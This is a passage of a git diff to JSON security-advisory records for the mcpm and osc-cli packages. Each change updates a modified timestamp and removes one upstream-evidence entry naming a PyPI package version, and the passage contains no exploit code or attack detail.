"BREW-mcpm-CVE-2026-40347", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mj87-hwqh-73pj", "CVE-2026-40347", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-41425.json b/advisories/BREW-mcpm-CVE-2026-41425.json index 9389aab76f9..58e7cc23395 100644 --- a/advisories/BREW-mcpm-CVE-2026-41425.json +++ b/advisories/BREW-mcpm-CVE-2026-41425.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-41425", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jj8c-mmj3-mmgv", "CVE-2026-41425", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-41479.json b/advisories/BREW-mcpm-CVE-2026-41479.json index db7dff41dc8..abf5a6d4a6a 100644 --- a/advisories/BREW-mcpm-CVE-2026-41479.json +++ b/advisories/BREW-mcpm-CVE-2026-41479.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-41479", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w8p2-r796-3vmq", "CVE-2026-41479", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-42561.json b/advisories/BREW-mcpm-CVE-2026-42561.json index cfdb0ab7c21..2a6f6d92a17 100644 --- a/advisories/BREW-mcpm-CVE-2026-42561.json +++ b/advisories/BREW-mcpm-CVE-2026-42561.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-42561", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pp6c-gr5w-3c5g", "CVE-2026-42561", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-44431.json b/advisories/BREW-mcpm-CVE-2026-44431.json index 5fea586cb9d..d8bea36c75b 100644 --- a/advisories/BREW-mcpm-CVE-2026-44431.json +++ b/advisories/BREW-mcpm-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-44431", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-44432.json b/advisories/BREW-mcpm-CVE-2026-44432.json index 55203ab5f75..cf4a7e0dba9 100644 --- a/advisories/BREW-mcpm-CVE-2026-44432.json +++ b/advisories/BREW-mcpm-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-44432", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-44681.json b/advisories/BREW-mcpm-CVE-2026-44681.json index 7d835fb47e1..2f02aa4168f 100644 --- a/advisories/BREW-mcpm-CVE-2026-44681.json +++ b/advisories/BREW-mcpm-CVE-2026-44681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-44681", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-r95x-qfjj-fjj2", "CVE-2026-44681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-4539.json b/advisories/BREW-mcpm-CVE-2026-4539.json index 5b2e119dca4..140813ca51d 100644 --- a/advisories/BREW-mcpm-CVE-2026-4539.json +++ b/advisories/BREW-mcpm-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-4539", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-45409.json b/advisories/BREW-mcpm-CVE-2026-45409.json index 850dbf5dd51..19630992f19 100644 --- a/advisories/BREW-mcpm-CVE-2026-45409.json +++ b/advisories/BREW-mcpm-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-45409", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48522.json b/advisories/BREW-mcpm-CVE-2026-48522.json index a67948b48a6..0fc1408bffe 100644 --- a/advisories/BREW-mcpm-CVE-2026-48522.json +++ b/advisories/BREW-mcpm-CVE-2026-48522.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48522", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-993g-76c3-p5m4", "CVE-2026-48522", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48523.json b/advisories/BREW-mcpm-CVE-2026-48523.json index 911a70607f0..a6e1f09ac4a 100644 --- a/advisories/BREW-mcpm-CVE-2026-48523.json +++ b/advisories/BREW-mcpm-CVE-2026-48523.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48523", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jq35-7prp-9v3f", "CVE-2026-48523", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48524.json b/advisories/BREW-mcpm-CVE-2026-48524.json index f0743852955..f207ce7150c 100644 --- a/advisories/BREW-mcpm-CVE-2026-48524.json +++ b/advisories/BREW-mcpm-CVE-2026-48524.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48524", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-fhv5-28vv-h8m8", "CVE-2026-48524", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48525.json b/advisories/BREW-mcpm-CVE-2026-48525.json index 8d94c6f72d9..91c9cf069f2 100644 --- a/advisories/BREW-mcpm-CVE-2026-48525.json +++ b/advisories/BREW-mcpm-CVE-2026-48525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48525", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w7vc-732c-9m39", "CVE-2026-48525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48526.json b/advisories/BREW-mcpm-CVE-2026-48526.json index 194d13b1694..a53224d58ed 100644 --- a/advisories/BREW-mcpm-CVE-2026-48526.json +++ b/advisories/BREW-mcpm-CVE-2026-48526.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48526", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-xgmm-8j9v-c9wx", "CVE-2026-48526", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48710.json b/advisories/BREW-mcpm-CVE-2026-48710.json index eba29eaf0d8..b1949543190 100644 --- a/advisories/BREW-mcpm-CVE-2026-48710.json +++ b/advisories/BREW-mcpm-CVE-2026-48710.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48710", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-29T09:17:13Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-86qp-5c8j-p5mr", "CVE-2026-48710", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48817.json b/advisories/BREW-mcpm-CVE-2026-48817.json index b0c3a7882c2..fb1e8bf9a55 100644 --- a/advisories/BREW-mcpm-CVE-2026-48817.json +++ b/advisories/BREW-mcpm-CVE-2026-48817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48817", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-x746-7m8f-x49c", "CVE-2026-48817", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48818.json b/advisories/BREW-mcpm-CVE-2026-48818.json index 676a7f0b2bb..e7bf02c2383 100644 --- a/advisories/BREW-mcpm-CVE-2026-48818.json +++ b/advisories/BREW-mcpm-CVE-2026-48818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48818", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wqp7-x3pw-xc5r", "CVE-2026-48818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-48990.json b/advisories/BREW-mcpm-CVE-2026-48990.json index c2e3f1f2ddb..ad7ccbdef7a 100644 --- a/advisories/BREW-mcpm-CVE-2026-48990.json +++ b/advisories/BREW-mcpm-CVE-2026-48990.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-48990", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wphv-vfrh-23q5", "CVE-2026-48990", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.1", - "key": "pkg:pypi/joserfc@1.7.1", - "resource": "joserfc" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-49852.json b/advisories/BREW-mcpm-CVE-2026-49852.json index 3129c1cd11e..d34cf2752d9 100644 --- a/advisories/BREW-mcpm-CVE-2026-49852.json +++ b/advisories/BREW-mcpm-CVE-2026-49852.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-49852", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gg9x-qcx2-xmrh", "CVE-2026-49852", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.1", - "key": "pkg:pypi/joserfc@1.7.1", - "resource": "joserfc" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-52869.json b/advisories/BREW-mcpm-CVE-2026-52869.json index 68a35b90916..9a00affd671 100644 --- a/advisories/BREW-mcpm-CVE-2026-52869.json +++ b/advisories/BREW-mcpm-CVE-2026-52869.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-52869", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jpw9-pfvf-9f58", "CVE-2026-52869", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-52870.json b/advisories/BREW-mcpm-CVE-2026-52870.json index 829bc2f2f41..b538898d1dd 100644 --- a/advisories/BREW-mcpm-CVE-2026-52870.json +++ b/advisories/BREW-mcpm-CVE-2026-52870.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-52870", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-hvrp-rf83-w775", "CVE-2026-52870", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-53537.json b/advisories/BREW-mcpm-CVE-2026-53537.json index 71bfadc6709..9a922504ad5 100644 --- a/advisories/BREW-mcpm-CVE-2026-53537.json +++ b/advisories/BREW-mcpm-CVE-2026-53537.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-53537", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vffw-93wf-4j4q", "CVE-2026-53537", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-53538.json b/advisories/BREW-mcpm-CVE-2026-53538.json index a775f68cbfb..4aa51b21a0b 100644 --- a/advisories/BREW-mcpm-CVE-2026-53538.json +++ b/advisories/BREW-mcpm-CVE-2026-53538.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-53538", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-6jv3-5f52-599m", "CVE-2026-53538", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-53539.json b/advisories/BREW-mcpm-CVE-2026-53539.json index 07a518347cd..60fa36d88a4 100644 --- a/advisories/BREW-mcpm-CVE-2026-53539.json +++ b/advisories/BREW-mcpm-CVE-2026-53539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-53539", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5rvq-cxj2-64vf", "CVE-2026-53539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-53540.json b/advisories/BREW-mcpm-CVE-2026-53540.json index 49da1ac765b..78aae672dff 100644 --- a/advisories/BREW-mcpm-CVE-2026-53540.json +++ b/advisories/BREW-mcpm-CVE-2026-53540.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-53540", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-v9pg-7xvm-68hf", "CVE-2026-53540", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-54282.json b/advisories/BREW-mcpm-CVE-2026-54282.json index 8a728378ded..07434e5bede 100644 --- a/advisories/BREW-mcpm-CVE-2026-54282.json +++ b/advisories/BREW-mcpm-CVE-2026-54282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-54282", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jp82-jpqv-5vv3", "CVE-2026-54282", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-54283.json b/advisories/BREW-mcpm-CVE-2026-54283.json index f64875c223b..fe060ad08aa 100644 --- a/advisories/BREW-mcpm-CVE-2026-54283.json +++ b/advisories/BREW-mcpm-CVE-2026-54283.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-54283", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-82w8-qh3p-5jfq", "CVE-2026-54283", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-59950.json b/advisories/BREW-mcpm-CVE-2026-59950.json index dd2b035e088..82cd649cc92 100644 --- a/advisories/BREW-mcpm-CVE-2026-59950.json +++ b/advisories/BREW-mcpm-CVE-2026-59950.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-59950", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vj7q-gjh5-988w", "CVE-2026-59950", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2013-1633.json b/advisories/BREW-osc-cli-CVE-2013-1633.json index 7c478f60980..dba6941c119 100644 --- a/advisories/BREW-osc-cli-CVE-2013-1633.json +++ b/advisories/BREW-osc-cli-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2013-1633", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2014-1829.json b/advisories/BREW-osc-cli-CVE-2014-1829.json index aea4d22839b..21412f0589c 100644 --- a/advisories/BREW-osc-cli-CVE-2014-1829.json +++ b/advisories/BREW-osc-cli-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2014-1829", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2014-1830.json b/advisories/BREW-osc-cli-CVE-2014-1830.json index 440d06d46ce..460fcaa2529 100644 --- a/advisories/BREW-osc-cli-CVE-2014-1830.json +++ b/advisories/BREW-osc-cli-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2014-1830", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2015-2296.json b/advisories/BREW-osc-cli-CVE-2015-2296.json index f48a57606f0..35c6c0284e5 100644 --- a/advisories/BREW-osc-cli-CVE-2015-2296.json +++ b/advisories/BREW-osc-cli-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2015-2296", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2016-9015.json b/advisories/BREW-osc-cli-CVE-2016-9015.json index 92653599048..31d00ddca2d 100644 --- a/advisories/BREW-osc-cli-CVE-2016-9015.json +++ b/advisories/BREW-osc-cli-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2016-9015", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2018-18074.json b/advisories/BREW-osc-cli-CVE-2018-18074.json index 0809eb971c9..73b0a2dbcc7 100644 --- a/advisories/BREW-osc-cli-CVE-2018-18074.json +++ b/advisories/BREW-osc-cli-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2018-18074", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2018-20060.json b/advisories/BREW-osc-cli-CVE-2018-20060.json index 63bbe6768ff..394ac6ce88b 100644 --- a/advisories/BREW-osc-cli-CVE-2018-20060.json +++ b/advisories/BREW-osc-cli-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2018-20060", "published": 